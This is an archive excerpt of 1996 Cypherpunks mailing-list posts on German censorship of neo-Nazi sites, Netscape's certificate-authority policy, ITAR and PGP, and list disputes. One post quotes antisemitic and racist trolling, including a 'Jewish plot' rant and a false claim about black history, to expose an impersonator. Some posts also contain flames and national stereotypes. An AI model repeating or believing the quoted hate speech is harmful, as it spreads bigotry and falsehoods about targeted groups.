To: cypherpunks@toad.com
Subject: Germany, or "Oh no not again"
Message-ID: <199601290341.WAA16406@UNiX.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


------- Forwarded Message Follows -------
Date:          Sun, 28 Jan 1996 19:30:21 -0500 (EST)
Reply-to:      educom@elanor.oit.unc.edu
From:          Educom <educom@elanor.oit.unc.edu>
To:            "EDUCOM Edupage Mailing List" <edupage@elanor.oit.unc.edu>
Subject:       Edupage, 28 January 1996


[..]
GERMAN PROSECUTORS TARGET INTERNET RACIAL HATRED
The Mannheim, Germany, prosecutor's office has launched an investigation of
CompuServe and Deutsche Telekom's T-Online service for inciting racial
hatred, a crime in Germany.  At issue is online access to a Web site run by
a neo-Nazi extremist in Canada who uses the Internet to distribute
anti-Semitic propaganda.  The legal reasoning, according to a prosecutor's
office spokesman, is that "because it's available over the Internet, it also
can be called up in Germany.  Then the scene of the crime is all Germany."
Although the investigation is now limited to CompuServe and T-Online, there
are also several hundred small companies that provide Internet access in
Germany. (Wall Street Journal 26 Jan 96 B2)
[..]


Edupage is written by John Gehl (gehl@educom.edu) & Suzanne Douglas
(douglas@educom.edu).  Voice:  404-371-1853, Fax: 404-371-8057.  

Technical support is provided by the Office of Information Technology,
University of North Carolina at Chapel Hill.

*************************************************************** 
EDUPAGE is what you've just finished reading.  (Please note that it's 
"Edupage" and not "EduPage.")  To subscribe to Edupage: send a message to:
listproc@educom.unc.edu and in the body of the message type: subscribe
edupage Emmitt Smith (assuming that your name is Emmitt Smith;  if it's not,
substitute your own name).  ...  To cancel, send a message to:
listproc@educom.unc.edu and in the body of the message type: unsubscribe
edupage.   (Subscription problems?  Send mail to educom@educom.unc.edu.)

--- "Mutant" Rob <wlkngowl@unix.asb.com>

Send a blank message with the subject "send pgp-key"
(not in quotes) for a copy of my PGP key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Tue, 30 Jan 1996 05:19:29 +0800
To: cypherpunks@toad.com
Subject: Re: Netscape, CAs, and Verisign
In-Reply-To: <199601281901.NAA06629@proust.suba.com>
Message-ID: <310C6C1D.5A0@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Alex Strasheim wrote:
> 
> I'm a big fan of Netscape and their products, and I think they do a good
> job of addressing the interests of their customers and the public at
> large with respect to crypto issues.
> 
> But it's starting to become apparent that there's a fairly serious problem
> with Certification Authorities and SSL.
> 
> The problem is simple enough:  sites with certificates from one of the CAs
> that are preconfigured in Netscape have a tremendous advantage over sites
> with certs from other CAs, and it's expensive and difficult to get a cert
> if you're running an alternative server like ApacheSSL.
> 
> This problem is going to get a lot worse when X509 client authentication
> becomes more popular.
> 
> Netscape needs to address the situation.  It's just not practical or
> desireable for one company (Verisign) to have a stranglehold on
> certificates.

  I agree with what you are saying.  I very much want to see real competition
in the certificate issuing business.  We are in the process of developing
a set of criteria that CAs have to meet in order to be included in the
"default" list of CAs that our products support.  The criteria focus
on assuring support for our customers more than trying to specify a
particular policy.  The criteria will include things like required
minimum response times for customer problems, compliance with an
interoperability spec, publishing of policies, etc.  Some time in
the next few months these criteria will be made public, and that 
should allow for open competition.

> I'd like to see a less centralized CA that's tied into the existing system
> of notaries.  The idea is to make it necessary to spoof a notary in order
> to spoof the CA.  That won't make spoofing the CA impossible (nothing
> will), but it will make spoofing the CA illegal.
> 
> A notary could apply to the CA for the right to work as an agent, for a
> nominal fee (<$100/year).  Only notaries could be agents.  If a person
> wants a certificate, they'd come in and present ID and a key to the
> notary/agent.  The person would have to present a form document stating
> that he's requesting the cert.  The notary would stamp the form and affix
> a signature to the key which would enable it to be processed automatically
> by the CA.
> 
> Fees for the whole procedure ought to be less than $30.  The CA ought to
> operate off of the fees from the agents as a non-profit organization, and
> the agents ought to keep the fees paid by the people requesting the
> certificates.
> 
> Would any of the lawyers on the list be willing to comment on whether or
> not it's possible or practical to tie a CA into the notary system?  Does
> anyone have any thoughts as to how difficult/risky spoofing my CA is
> compared to spoofing Netscape or Verisign?
> 
> I could put up a server and I think I know a laywer who would help me set
> up a non-profit organiation on a shoestring, but I don't want to do it if
> the plan is impractical.
> 
> Morevover, although I don't think it's reasonable to expect Netscape to
> agree to include a non-existent CA in their browsers sight unseen, at the
> same time it doesn't seem smart to sink money into setting up the CA
> without some indication from Netscape that they're willing to give the
> idea good faith consideration.

  I would suggest that you wait until you see our published criteria before
you spend too much effort setting up such a service, so that you can
be sure to meet them.  We don't care how big a company you are, as long
as you agree to provide our customers with a reasonable level of support
and issue certs that are compatible with our products.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Tue, 30 Jan 1996 05:19:20 +0800
To: sameer <sameer@c2.org>
Subject: Re: Netscape, CAs, and Verisign
In-Reply-To: <199601281901.NAA06629@proust.suba.com>
Message-ID: <310C6C76.AB8@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


sameer wrote:
> 
> >
> > Morevover, although I don't think it's reasonable to expect Netscape to
> > agree to include a non-existent CA in their browsers sight unseen, at the
> > same time it doesn't seem smart to sink money into setting up the CA
> > without some indication from Netscape that they're willing to give the
> > idea good faith consideration.
> >
>         They won't. You're not a megacorp in bed with RSA.

  As I said in my previous message, we don't care how big you are
as long as you meet the soon to be published criteria.

	--Jeff

PS - If you think that verisign is a megacorp, your view of the world is
     a bit skewed.

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Mon, 29 Jan 1996 12:34:58 +0800
To: cypherpunks@toad.com
Subject: Re: "German service cuts Net access" (to Santa Cruz)
In-Reply-To: <2.2.32.19960128144005.00690390@arn.net>
Message-ID: <HZ6FiD86w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


"David K. Merriman" <merriman@arn.net> writes:
> This message is _clearly_ an effort to spread *pornography* on the net. ...

Heck, any message on the Internet is inherently pornographic because it's
just a bunch of 1's and 0's. And we all know that to Sen Exon a 1 looks
like a penis and a 0 looks like a vagina! :-)

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Wed, 31 Jan 1996 19:54:37 +0800
To: Rich Graves <cypherpunks@toad.com
Subject: Re: [rant] A thought on filters and the V-Chip
Message-ID: <m0tgnTn-00090jC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 06:38 PM 1/26/96 -0800, Rich Graves wrote:
>On Fri, 26 Jan 1996, jim bell wrote:

>> On the other hand, this would be an EXCELLENT "argument" to bring in front
>> of a Congressional committee considering the adoption of any V-chip type
>> proposal.  Once they discover that a ratings system could be used for the
>> diametrically opposite reasons of their reason for having it in the first
>> place, they'll try to modify their proposal to prevent this.  
>> 
>> If we're lucky, this'll have the effect of killing the whole concept of
>> government-sponsored (required?) V-chip-type technology.
>> 
>> OTOH, I agree with other posters who think that truly voluntary content
>> selection would be an excellent addition to television:  In effect, an
>> automatic, programmable TV-Guide search engine.
>
>While it's hard to find a general theme here, I think I disagree. 

What?  You mean you LIKE to read TV guide every week, cover to cover, in 
advance, to scedule your TV viewing habits?

>Anyway, 
>I don't think that even truly voluntary content selection is a good idea, 
>because it reduces art to numbers, which is wrong.

Aw, admit it.  You're just still pissed 'cause I called  you a f------ 
statist.  <G>>

Me, I'd like to be able to tell my "TV-Guide search engine" to:

1.   Look for this particular show or movie.
2.   Look for this particular star, director, or other participant..
3.   Follow a subject thread, say on the news.
4.   etc.

Maybe even a more complex (artificially intelligent) agent that "knows" me 
well enough to anticipate my desires.


> lead to a balkanization that diminishes the common
>culture. I think it was good the way network TV was limited to the lowest
>common denominator, but with variety. People who wanted something with a
>little more flavor than WonderBread [tm] were able to find it, but they
>did have to look, which often involved *meeting other people* with common
>interests, and they still tuned in to Ed Sullivan to see what the Joneses
>were watching. Give people 1024 bits' worth of channels to choose from,
>classified by arbitrary criteria involving no human contact, and you get
>something entirely different. I'm not sure what's happening now, but I
>don't think I like it. 

You're entitled to NOT like it.  But I'm equally entitled to use modern 
technology to sift through 60+ cable channels, or 300+ DSS-type channels.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Tue, 30 Jan 1996 03:59:49 +0800
To: cypherpunks@toad.com
Subject: Re: "German service cuts Net access" (to Santa Cruz)
In-Reply-To: <199601290252.VAA18010@toxicwaste.media.mit.edu>
Message-ID: <546FiD88w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Derek Atkins <warlord@MIT.EDU> writes:
> > As a point of information, the operators of the "Amateur Action" bulletin
> > board in Fremont, California are now sitting in prison because they
> > e-mailed material fully legal in California but illegal (the court
> > determined) in Memphis, Tennessee.
>
> Actually, it wasn't because of what they emailed, but rather the
> owner/operators of AA BBS snail-mailed a video cassette that contained
> "pornographic" materials.  Unfortunately it sets a bad precedent
> nonetheless.

I didn't follow this case that closely, but I'm quite certain that I read on
the net that the prosecution's witnesses dialed AA BBS _by modem_ from TN
(establishing jurisdiction) and downloaded the materials that were later found
to be offensive to TN's community standards. Snail mail may have been also
involved, but I definitely recall that letting someone in TN download the stuff
via modem was in the indictment.

IMO, this sets a precedent for the German incident.

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@nic.ai>
Date: Mon, 29 Jan 1996 15:25:02 +0800
To: jsw@netscape.com (Jeff Weinstein)
Subject: Re: Netscape, CAs, and Verisign
In-Reply-To: <310C6C76.AB8@netscape.com>
Message-ID: <199601290658.WAA20767@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


>   As I said in my previous message, we don't care how big you are
> as long as you meet the soon to be published criteria.

	OK, fine, erase the word "megacorp", and my statement holds.
The fact that Verisign lies to my customers, tarnishing my reputation,
doesn't exactly endear me to them, or companies related to them.

-- 
Sameer Parekh					Voice:   510-601-9777x3
Community ConneXion, Inc.			FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org/ (or login as "guest")		sameer@c2.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ted Garrett <teddygee@visi.net>
Date: Tue, 30 Jan 1996 03:59:52 +0800
To: packrat@tartarus.uwa.edu.au
Subject: Re: more RANTING about NSA-friendly cpunks
Message-ID: <2.2.32.19960129041358.0069fc48@mail.visi.net>
MIME-Version: 1.0
Content-Type: text/plain


At 01:10 PM 1/28/96 +0800, you wrote:
>In message <199601262011.MAA17408@netcom16.netcom.com>, 
>  "Vladimir Z. Nuri" wrote:
>> has anyone *tried* just ignoring the ITAR wrt crypto and seeing what 
>> would happen?
[snip]
>> but aren't we equally as comic in assuming that violating the ITAR
>> crypto sections will inevitably bring the 4 horsemen of the NSA??
>
>One word...
>Zimmerman.
>I do agree with what you're saying though.

  But what he's saying is basically this:  If instead of targeting a single
entity - (eg Zimmerman) for a crypto violation, they had to look at
thousands of separate entities per violation (eg cypherpunks, inner circle,
users on AOL who have a clue, mit professors, cryptographic experts, corner
preachers, etc.), then soon the court system would be forced to come to the
realization that, indeed, the genie IS out of the bottle, and the system as
a whole would have to recognize that a change needs to be made.  As it
stands, they bullied on ONE man for something he didn't do, and could drop
the case without there needing to be a precedent set.

  Because there is now no precedent, the NSA and FBI can still use the ITAR
regulations to batter any indiviual who attempts to distribute strong
cryptography tools to the general public.  If they had been confronted with
tens, hundreds, thousands, or tens of thousands of people tangibly involved
in distributing cryptographic tools, then it would have been much harder for
them to say "We are just going to drop this.".  They would have had to
either go the distance or dismiss it in the beginning.

  If PGP had been developed under the gnu charter or the Linux concept, what
would the government have been able to do about it being distributed?  NOT A
DAMNED THING.

Or at least that's my opinion.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Wed, 31 Jan 1996 20:04:30 +0800
To: jim bell <cypherpunks@toad.com
Subject: Re: Over-reacting?
Message-ID: <2.2.32.19960129072232.0092f538@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:38 PM 1/28/96 -0800, jim bell wrote:
>At 05:42 PM 1/28/96 -0800, Timothy C. May wrote:

>>We already have enough traffic here, and don't need replies from a bunch of
>>other lists, be they libertarian lists, digital commerce lists, human
>>rights lists, or java lists.
>>
>>The latest example of this is the rantfest invvolving these players:
>
>I really don't know why I'm being "killed" by May in this way.  He cites a 
>rant by a local (Portland, Oregon) crackpot named "Jack Hammer."  I even 
>took the time to apologize for his existence, while I do claim a certain 
>lack of responsibility:  Basically, I'm being targeted because Hammer can't 
>stand my essay.  (Whether May will even see my apology is in doubt, I 
>suppose...)  While May certainly has the right to "killfile" whomever he 
>wishes, it might be a bit more logical to do this in a graduated fashion, 
>"killing" Hammer and then waiting to see if the rest of us follow in his 
>habits.

The reason for the killfiling is your habit of adding multiple additional
mailing list into the To: and cc: list.  I have seen more than one post
where you have added a Libritarian list and the "Democracy Now Channel 2'
list into the fray, not to mention other individuals.  THAT is why you are
getting the golden killfile, not your association with Jack "Acid" Hammer.
(Though that may help...)

The only individual I have killfiled (so far) is Dr. Fred. (At least on
mailing lists.  Usenet is another matter...)
  
Alan Olsen -- alano@teleport.com -- Contract Web Design & Instruction
        `finger -l alano@teleport.com` for PGP 2.6.2 key 
                http://www.teleport.com/~alano/ 
         Is the operating system half NT or half full?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jf_avon@citenet.net (Jean-Francois Avon (JFA Technologies, QC, Canada))
Date: Mon, 29 Jan 1996 13:06:29 +0800
To: cypherpunks@toad.com
Subject: Re: Downsizing the NSA
Message-ID: <9601290442.AA23563@cti02.citenet.net>
MIME-Version: 1.0
Content-Type: text/plain


Timothy C. May wrote:

>AT&T is downsizing, IBM downsized a while back, so why couldn't the NSA
>just do the right thing: admit that the Soviet threat is no more,
>congratulate the victors, and downsize by 20,000 employees?

Your post is very interesting.  I would like to add to it in the form of a question:

Q) What are the factors, in what context did AT&T and IBM and many other big companies downsize?  Or, in other words: What are the ultimate contextual causes of the downsizing?


Regards to Cypherpunks from a new guy on the mailing list.

JFA





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mpd@netcom.com (Mike Duvos)
Date: Mon, 29 Jan 1996 16:04:00 +0800
To: cypherpunks@toad.com
Subject: Re: "German service cuts Net access" (to Santa Cruz)
In-Reply-To: <m0tgnaN-0006FvC@dwarf>
Message-ID: <199601290738.XAA25006@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


olmur@dwarf.bb.bawue.de (Olmur) writes:

 > Free speech ends where other people can reasonable claim
 > that their feelings are badly hurt.

Excuse me?  That line is definitely .sig file fodder.

 > Is it constitutionally protected in US to knowingly hurt
 > other people's feelings and to trample on graves?????

Of course it is.  What a silly question.  My feelings get hurt on
Usenet almost every day and you don't see me whining about it.

 > Mike's information is old.  Meanwhile it's explicitely
 > forbidden to deny the holocaust.

I'm so pleased to hear you have updated your laws with this new
progressive "hurt feelings" doctrine.  Obviously "PC" translates
quite well into the German language.

 > Due to our history publishing NAZI-propaganda is forbidden
 > in Germany. The big majority in Germany agrees with this
 > view, that NAZI-propaganda doesn't fall under 'free speech'.

Much as the Third Reich took the view that anti-Nazi speech
wasn't protected.  Your country hasn't changed its authoritarian
perspective on freedom of personal expression.  All it has done
is put a different set of publicly supported items on the
official censorship list.

Didn't the Germans learn anything from World War II?

--
     Mike Duvos         $    PGP 2.6 Public Key available     $
     mpd@netcom.com     $    via Finger.                      $






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Rev. Ben" <samman-ben@CS.YALE.EDU>
Date: Tue, 30 Jan 1996 04:01:25 +0800
To: Den of CryptoAnarchists <cypherpunks@toad.com>
Subject: New Software
Message-ID: <Pine.A32.3.91.960128232626.26112B-100000@FROG.ZOO2.CS.YALE.EDU>
MIME-Version: 1.0
Content-Type: text/plain


Release time.

And I guess I finally get to add my name to the roles of Cpunks that 
'write code'.  

I finished a release of a simple Zero Knowledge Authentication system 
that uses the GNU Multiprecision Library to implement a modified 
Fiat-Feige-Shamir ZKIPS.  It is written in C on FreeBSD 2.1-R but should 
run on anything that uses BSD socket code.  I tried to write it fairly 
portably.

It is a very early release with little bounds checking or any of the 
hardening that would be required in a secure environment--hell in a 
secured environment, you'd want to write the bignum package yourself.  
But in any case, its just to get some practice writing this sort of code 
as well as amuse myself

My latest project is to write a HTTP anonymizer--sort of like a bit 
launderer.  The plan would be to allow a server to be browsed without 
actually giving away its real address by using a proxy.

The client would have an encrypted URL that would be passed to the 
proxy.  The proxy, using its own private key would decrypt the real URL 
and make the  HTTP request to the server.  This would opaque the server's 
identity from the client.

While this sounds all well and good, unless there are multiple proxies 
deployed a-la Mixmaster with encapsulated encryption, there is the threat 
that the proxy would be able to match up server-client pairs.

In any case, I'm open to suggestions on this project--its very open ended 
and should be done in a couple of months.

If anyone would like a copy of the work done mail me and I'll send you a 
tarball.

Ben.

PS: Does anyone know of any French COMPUSEC firms that I could contact?  
I'd like to try to get a job there for next year.
____
Ben Samman..............................................samman@cs.yale.edu
"If what Proust says is true, that happiness is the absence of fever, then
I will never know happiness. For I am possessed by a fever for knowledge,
experience, and creation."                                      -Anais Nin
PGP Encrypted Mail Welcomed      Finger samman@powered.cs.yale.edu for key
Want to give a soon-to-be college grad a job?         Mail me for a resume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jrochkin@cs.oberlin.edu (Jonathan Rochkind)
Date: Mon, 29 Jan 1996 13:16:33 +0800
To: cypherpunks@toad.com
Subject: Re: "German service cuts Net access" (to Santa Cruz)
Message-ID: <ad31bae6080210042931@[132.162.233.188]>
MIME-Version: 1.0
Content-Type: text/plain


At 1:47 AM 01/29/96, Felix Lee wrote:
>> Are you saying that, if I ran a bookstore, and accepted international
>> mail orders, I would have to screen every order to ensure I did not
>> ship something offensive to the German government?
>
>urrr.  yes?  anyone doing international shipping has to comply with
>customs regulations anyway.  this isn't really any different.  (except
>when telecom or broadcast media become involved.)
>
>(excuse me while I see if I can ship smallpox to germany.)
>--

If you violate customs regulations on the receiving end, all that's going
to happen is the book you sent gets confiscated.    Which is only bad for
the receiving party (in Germany), since you already have the money, which
is fine since it's reasonable to expect the receiving party in Germany to
know German customs regulations.  You, as shipper, certainly won't get
extradicted to Germany from Denmark or anywhere else.

Trying to ship smallpox to Germany might be another matter, of course.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: liberty@gate.net (Jim Ray)
Date: Tue, 30 Jan 1996 03:58:06 +0800
To: cypherpunks@toad.com
Subject: Re: An Enigma - Wrapped In a Circle
Message-ID: <199601290505.AAA36182@osceola.gate.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

"Perry E. Metzger" foamed:

<snip>

I wrote:

>> 1. Flame me, in *private* e-mail. [I'll happily ignore you.]
>> 2. Go hump a tree.
>
>What the hell is the cypherpunks relevance here, anyway? I mean, other
>than trying to elicit a response from me, which you surely knew would
>show up, was there any purpose to this? Why are crop circles important
>to people worrying about cryptography and cryptography policy? What
>possible linkage could there be?

Why Perry! I see your point! Any phenomenon that elicits articles
with titles like "Ciphers in the Crops" could have nothing at all
to do with cryptography...
I repeat: Go hump a tree. In complaining about supposed "noise,"
you cause more noise than any other person on this list. Learn
to read before you spew, or just learn to shut up!
JMR

Regards, Jim Ray  --  Boycott espionage-enabled software!

 "He that would make his own liberty secure, must guard even
  his enemy from oppression; for if he violates this duty, he
  establishes a precedent that will reach to himself." - T. Paine
            http://www.shopmiami.com/prs/jimray
_______________________________________________________________________
PGP key Fingerprint  51 5D A2 C3 92 2C 56 BE  53 2D 9C A1 B3 50 C9 C8 
Public Key id. #  E9BD6D35  <liberty@gate.net>  IANAL
_______________________________________________________________________


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Freedom isn't Freeh.

iQCVAwUBMQxOvW1lp8bpvW01AQFvBgP/YQM2CA/f+wq9jCCc/s6BeXm+Lqr6ihCS
BhPeB3556EET0mj91XhR1bl5FPb9aUb2f3CeNMBmacr4L/EjAK5S4Fst0WZ10UA8
m7a07IdFdb8wN+TKpAUR4TMmApV1nHnq3fStrSnn1el32rbnMvMmHBDzfXF6wVfk
VKvffK+S+WA=
=b8Pt
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex Strasheim <cp@proust.suba.com>
Date: Tue, 30 Jan 1996 05:14:10 +0800
To: cypherpunks@toad.com
Subject: Re: pgp on linux
In-Reply-To: <199601290513.FAA30591@pangaea.hypereality.co.uk>
Message-ID: <199601290607.AAA07906@proust.suba.com>
MIME-Version: 1.0
Content-Type: text


> i can't seem to get pgp compiled on my linux machine. where should i ask
> about this?- since cypherpunks would be a bad choice. thanks.

I like anonymity as much as the next guy, but if you're asking for help 
it's not really appropriate -- lots of disinterested people are going to 
read this, when they really shouldn't have to.

The place to ask about pgp is alt.security.pgp.  If you post there, try 
to say what happened when you attempted to compile the program.

Before you post anywhere, try grabbing the .tar.gz version instead of the 
.zip version -- there are some case sensitive file names that munge on 
linux in the .zip version.  The other ought to compile out of the box.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jf_avon@citenet.net (Jean-Francois Avon (JFA Technologies, QC, Canada))
Date: Mon, 29 Jan 1996 13:52:23 +0800
To: cypherpunks@toad.com
Subject: Re: "German service cuts Net access" (to Santa Cruz)
Message-ID: <9601290524.AA25174@cti02.citenet.net>
MIME-Version: 1.0
Content-Type: text/plain


Well, here is a very costly but ultimate answer:

Cancel all business you have with germany and let them know the reason.

This will speak much more louder than any civil liberty protest.

The feodal view of most europe makes any appeal to liberty futile.



JFA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Tue, 30 Jan 1996 02:36:23 +0800
To: Alan Olsen <cypherpunks@toad.com
Subject: Re: Over-reacting?
Message-ID: <m0tgoqU-00090CC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 11:22 PM 1/28/96 -0800, Alan Olsen wrote:

>The reason for the killfiling is your habit of adding multiple additional
>mailing list into the To: and cc: list.  I have seen more than one post
>where you have added a Libritarian list and the "Democracy Now Channel 2'
>list into the fray, not to mention other individuals.  THAT is why you are
>getting the golden killfile, not your association with Jack "Acid" Hammer.
>(Though that may help...)

Hmmm..  It's odd that nobody has ever warned me of this before.  (Another
spoof?)

That's why I'm using the term, "over-reacting."


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMQyDUvqHVDBboB2dAQFduAQAlas9DMaiatiYd51WKepEzLGPBWl4I9+2
FNOUzoQoy3OQ+wdk7lT1FFqvrDqSqviIj8MZ6j7/7ENO55W6D8AiN2fFXBbd3iY5
7krA13rTlx6N8ztvqE2+QY0/0RMtHZV6mLOR0SdbedOahUMc6/8qxF1auvJTxtJq
5qU3zS+71IQ=
=9edM
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Declan B. McCullagh" <declan+@CMU.EDU>
Date: Mon, 29 Jan 1996 13:52:26 +0800
To: cypherpunks@toad.com
Subject: Ernst Zundel impersonator on Usenet
Message-ID: <sl35cBm00YUr8g7L9c@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Ernst Zundel is the holocaust revisionist who sparked the Wiesenthal
Center's attempts at censorship, and the latest move by the German
government.

Now an AOL alias, "ernstzundl@aol.com", is being used in the course of an 
impressive trolling spree on Usenet newsgroups including aus.flame,
alt.skinheads, alt.mindcontrol, and soc.culture.jewish.

Some excerpts from posts to soc.culture.jewish:

        Prior to 1904, there *were* no black people.  But they
        invented the whole myth of Africa, the slave trade, pyramids
        in Egypt, etc-- to serve their own ends.  I know this because
        *I* have studied history.  This is why I am the Revisionist
        Extraordinaire.  I know obscure things about history that
        nobody except me knows.

        FOIL THE JEWISH PLOT!!  POLUTE THE EARTH!!  CONTAMINATE THE
        WATER!!  DESTROY EVERY LIVING THING TO SAVE IT FROM THE JEWS!!
        AND THEN WAIT FOR THE MOTHER SHIP TO BRING US TO OUR HOME IN
        THE STARS!

I found an interesting message with the help of Alta Vista. Posted by
"ernstzundl@aol.com" to rec.scuba, it said:

        Does anyone know of any scuba clubs in or near Kingston, NY?

        Thanks!

I'm not familiar with how AOL screen names work, but my guess is that
the Kingston, NY resident impersonating Zundel forgot to switch back
to his other screen name before posting.

-Declan





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Mon, 29 Jan 1996 16:55:27 +0800
To: cypherpunks@toad.com
Subject: Re: "Concryption" Prior Art
Message-ID: <199601290832.AAA09285@ix10.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


>>However the Con-cryption patent covers first compressing, then
>>encrypting.
>
>Isn't that how PGP does its thing (first compress the data and then feed it
>into the Encryption Stage)? PGP is prior art in-and-of-itself.

Peter Wayner posted that the "new" thing about the way they do it is
that it saves time by combining the steps.  But I think I've seen
approximately the same done with arithmetic-coding compression?
#--
#				Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com, Pager/Voicemail 1-408-787-1281
#
# "Eternal vigilance is the price of liberty" used to mean us watching
# the government, not the other way around....





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Derek Atkins <warlord@MIT.EDU>
Date: Mon, 29 Jan 1996 14:03:02 +0800
To: cpunk@remail.ecafe.org (ECafe Anonymous Remailer)
Subject: Re: pgp on linux
In-Reply-To: <199601290513.FAA30591@pangaea.hypereality.co.uk>
Message-ID: <199601290541.AAA19848@toxicwaste.media.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


Hi.

There is a known problem in the PGP 2.6.2 distribution.  In order to
compile it for Linux/ELF, you will need to make a change to the
sources.  The quick change is to add "ASMDEF=-DSYSV" to the Linux make
rule in the makefile.  However this will not allow it to compile under
Linux/a.out anymore.

The proper fix, which is detailed on the PGP FAQ, Buglist, Fixes, and
Improvements Page is to modify 80386.S and zmatch.S to look for the
symbol __ELF__ in addition to SYSV.  This page, by the way, is
available at this URL:

	http://www.mit.edu:8001/people/warlord/pgp-faq.html

Enjoy!

-derek




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Tue, 30 Jan 1996 05:14:20 +0800
To: pcw@access.digex.net (Peter Wayner)
Subject: Clipper technicalities (Was: Denning's misleading statements)
In-Reply-To: <ad317abe070210042132@[199.125.128.5]>
Message-ID: <199601290554.AAA02373@homeport.org>
MIME-Version: 1.0
Content-Type: text


Peter Wayner wrote:

| But, on the other side of the fence, I just passed a section in
| _Takedown_ where Shimomura and the FBI agents decide that the
| best place for the Clipper phones is "in the trunk." Apparently
| they don't communicate with regular phones so they were
| practically worthless.

	The AT&T 3600c does interoperate.  I posted to Cypherpunks
about them shortly after the HOPE conference in NYC in August 94.
Check the archives for the full post, but they start a conversation as
normal phones, you hit a button, and one unit sends touch tones for
2587, and they start encrypting.

http://www.hks.net/cpunks/cpunks-7/0191.html

Adam

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Mon, 29 Jan 1996 17:23:35 +0800
To: Censored Girls Anonymous <carolann@censored.org>
Subject: Re: CP LITE: A Censorship Device?
Message-ID: <199601290902.BAA11615@ix10.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 03:54 AM 1/28/96 -0600, you wrote:
>I've been watching this CP Lite thing develop.
>
>Sounds like an attempt to moderate the list.
>I mean it's easy to post out of it,
>but hard to answer to it.
>And all of the good back and forth discussion
>gets lost in a backwash of private email.

The default behaviour of Eudora seems to work reasonably well
for replying to these.  Reply pops up a message with
        To:     John Doe #2 <jdoe-2@alpha.c2.org>
        From:   My Name <me@here.com>
        Subject: Re: whatever
        Cc:
        At 03:54 AM 1/28/96 -0600, you wrote:
        > WHATEVER IT WAS
and you can just fill in cypherpunks@toad.com as the Cc:.

Your mailer may vary, but it's probably got a similar capability.
The main problem I have is the "you wrote" as opposed to
"John Doe <jdoe-2@alpha.c2.org> wrote", which is more like
what you want for mailing lists, but that can be copy&pasted or ignored.

The person you're replying to usually gets two copies, but that's minor.
#--
#				Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com, Pager/Voicemail 1-408-787-1281
#
# "Eternal vigilance is the price of liberty" used to mean us watching
# the government, not the other way around....





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Declan B. McCullagh" <declan+@CMU.EDU>
Date: Tue, 30 Jan 1996 05:17:43 +0800
To: "James A. Donald" <jamesd@echeque.com>
Subject: Re: "German service cuts Net access" (to Santa Cruz)
In-Reply-To: <199601290519.VAA14243@mailx.best.com>
